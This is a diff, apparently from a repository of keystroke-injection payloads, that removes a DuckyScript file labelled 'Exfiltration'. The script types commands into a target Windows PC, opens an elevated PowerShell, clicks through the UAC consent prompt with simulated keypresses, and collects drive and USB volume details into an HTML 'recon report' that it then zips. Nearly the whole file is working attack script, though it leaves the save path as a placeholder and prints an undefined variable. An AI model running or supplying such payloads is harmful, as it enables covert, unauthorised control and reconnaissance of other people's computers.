■ ■ ■ ■ ■ ■
Exfiltration/USB_And_Harddrive_Information/USB_And_Harddrive_Information.txt
1 | | - | REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) |
2 | | - | REM Description: Saves some general Information about the USB and Harddrives that are/were connected to the target pc and stores them into a file. |
3 | | - | REM Version: 1.0 |
4 | | - | REM Category: Exfiltration |
5 | | - | DELAY 750 |
6 | | - | WINDOWS d |
7 | | - | DELAY 900 |
8 | | - | WINDOWS r |
9 | | - | DELAY 900 |
10 | | - | STRING powershell Start-Process powershell -Verb runAs |
11 | | - | ENTER |
12 | | - | DELAY 750 |
13 | | - | LEFTARROW |
14 | | - | ENTER |
15 | | - | DELAY 900 |
16 | | - | ALT y |
17 | | - | DELAY 900 |
18 | | - | GUI UP |
19 | | - | DELAY 900 |
20 | | - | STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;$style = '<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>';$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo-68597243.html';$Report = $Report + '<div id=body><h1>Walkuer Ghost Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>';$u = 0;$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace);$Report = $Report + '<div id=right><h3>USB Devices</h3><table>' |
21 | | - | ENTER |
22 | | - | STRING do { |
23 | | - | ENTER |
24 | | - | STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) |
25 | | - | ENTER |
26 | | - | STRING $Report = $Report + '<tr><td>Drive Name: </td><td>' + $allUsb[$u].Name + $allUsb[$u].Label + '</td><td>Free Space: </td><td>' + $gbUSB + 'GB</td></tr>' |
27 | | - | ENTER |
28 | | - | STRING Write-Output $fullUSB |
29 | | - | ENTER |
30 | | - | STRING $u ++ |
31 | | - | ENTER |
32 | | - | STRING } while ($u -lt $allUsb.Count) |
33 | | - | ENTER |
34 | | - | STRING $Report = $Report + '</table></div>' |
35 | | - | ENTER |
36 | | - | STRING $Report >> $fileSaveDir'/ComputerInfo-68597243.html' |
37 | | - | ENTER |
38 | | - | STRING Compress-Archive -Path $fileSaveDir -DestinationPath PATH TO SAVE FILE HERE\HEREresults-68597243.zip ; exit |
39 | | - | ENTER |